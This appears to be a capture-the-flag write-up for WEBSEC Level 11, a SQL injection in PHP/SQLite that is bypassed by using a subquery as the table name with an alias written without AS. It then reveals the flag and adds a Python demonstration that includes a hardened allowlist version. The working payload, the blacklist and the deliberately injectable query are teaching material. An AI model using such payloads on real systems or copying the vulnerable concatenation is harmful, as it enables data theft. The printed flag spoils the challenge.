WEBSEC Level 11

Challenge description

It's not AS simple AS it looks

Initial analysis

The relevant part of the challenge's PHP source (the body of `sanitize()` is not shown on the page; it rejects input containing any entry of `$blacklist`):

```php
<?php
// Characters and keywords the challenge refuses to accept.
$special1 = ["!", "\"", "#", "$", "%", "&", "'", "*", "+", "-"];
$special2 = [".", "/", ":", ";", "<", "=", ">", "?", "@", "[", "\\", "]"];
$special3 = ["^", "_", "`", "{", "|", "}"]; // the backtick was lost in extraction; restored from the ASCII ordering of the list
$sql      = ["union", "0", "join", "as"];
$blacklist = array_merge($special1, $special2, $special3, $sql);

if (isset($_POST['submit']) && isset($_POST['user_id']) && isset($_POST['table'])) {
    $id    = $_POST['user_id'];
    $table = $_POST['table'];

    sanitize($id, $table); // blacklist check only; not defined on the page

    $pdo = new SQLite3('database.db', SQLITE3_OPEN_READONLY);

    // Both the table name and the id are concatenated straight into the query.
    $query = 'SELECT id,username FROM ' . $table . ' WHERE id = ' . $id;
    //$query = 'SELECT id,username,enemy FROM ' . $table . ' WHERE id = ' . $id;

    $getUsers = $pdo->query($query);
    $users    = $getUsers->fetchArray(SQLITE3_ASSOC);

    $userDetails = false;
    if ($users) {
        $userDetails          = $users;
        $userDetails['table'] = htmlentities($table);
    }
}
```

Note that `as` is on the blacklist, which is what the level title hints at: SQLite does not require the `AS` keyword for an alias, so `enemy username` renames the `enemy` column to `username`, and the `table` parameter can be replaced with a parenthesised subquery that provides those columns.

Walkthrough

STEP 1: Intercept the request in Burp.

STEP 2: user_id=2&table=costume&submit=Submit+Query
OUTPUT: The hero number 2 in costume is Spiderman

STEP 3: id=2&table=(select 2 id, enemy username from costume)&submit=Submit+Query
OUTPUT: The hero number 2 in (select 2 id, enemy username from costume)
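The following is an added example, not code from the challenge or from the original post. It rebuilds the blacklist from the PHP above in Python against an in-memory SQLite database with constructed sample rows, shows that SQLite accepts a column alias without `AS`, shows that the blacklist lets the subquery-as-table value from STEP 3 through, and puts the fix beside it: an allowlist for the table name (an identifier cannot be bound as a parameter) and a bound integer for the id. The `sanitize()` reconstruction as a case-insensitive substring match, the sample data and the allowlist are assumptions.

```python
import sqlite3

# Blacklist copied from the challenge's PHP (the backtick entry is assumed; see above).
SPECIAL1 = ["!", "\"", "#", "$", "%", "&", "'", "*", "+", "-"]
SPECIAL2 = [".", "/", ":", ";", "<", "=", ">", "?", "@", "[", "\\", "]"]
SPECIAL3 = ["^", "_", "`", "{", "|", "}"]
SQL_WORDS = ["union", "0", "join", "as"]
BLACKLIST = SPECIAL1 + SPECIAL2 + SPECIAL3 + SQL_WORDS

# Assumed allowlist for the hardened version: the only table the page needs.
ALLOWED_TABLES = {"costume"}


def blacklist_sanitize(value: str) -> bool:
    """Assumed reconstruction of the challenge's sanitize(): True when the value
    contains none of the blacklisted characters/keywords (case-insensitive)."""
    low = value.lower()
    return not any(token in low for token in BLACKLIST)


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the challenge's database.db."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE costume (id INTEGER, username TEXT, enemy TEXT)")
    conn.executemany(
        "INSERT INTO costume VALUES (?, ?, ?)",
        [(1, "Batman", "Joker"), (2, "Spiderman", "Green Goblin")],
    )
    return conn


def alias_without_as(conn: sqlite3.Connection):
    """SQLite treats 'enemy username' as an alias even without the AS keyword.
    Returns (reported column name, value) for hero 2."""
    cur = conn.execute("SELECT enemy username FROM costume WHERE id = 2")
    return cur.description[0][0], cur.fetchone()[0]


def vulnerable_lookup(conn: sqlite3.Connection, table: str, user_id: str):
    """Mirrors the challenge: blacklist check, then string concatenation.
    Returns the (id, username) row, or None when the blacklist rejects the input."""
    if not (blacklist_sanitize(table) and blacklist_sanitize(user_id)):
        return None
    query = f"SELECT id,username FROM {table} WHERE id = {user_id}"
    return conn.execute(query).fetchone()


def safe_lookup(conn: sqlite3.Connection, table: str, user_id: str):
    """Hardened version: identifier from a fixed allowlist, id bound as an integer.
    Returns the (id, username) row, or None when the input is rejected."""
    if table not in ALLOWED_TABLES:
        return None
    try:
        uid = int(user_id)
    except ValueError:
        return None
    # The table name is one of our own literals, so quoting it as an identifier is safe;
    # the id never touches the SQL text.
    query = f'SELECT id,username FROM "{table}" WHERE id = ?'
    return conn.execute(query, (uid,)).fetchone()


if __name__ == "__main__":
    db = make_db()
    payload = "(select 2 id, enemy username from costume)"
    print("alias without AS:", alias_without_as(db))
    print("blacklist passes payload:", blacklist_sanitize(payload))
    print("vulnerable:", vulnerable_lookup(db, payload, "2"))
    print("hardened:", safe_lookup(db, payload, "2"))
```

Two things worth noticing when running it: the blacklist is both too weak (it does not stop the parenthesised subquery) and too strict (the literal `0` entry rejects any id such as `10`), which is the usual outcome of blacklisting; the allowlist plus bound parameter has neither problem.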

Flag

FLAG: WEBSEC{Who_needs_AS_anyway_when_you_have_sqlite}

For further queries, please DM me on Twitter: https://twitter.com/gopika-subramanian.




OTHER POSTS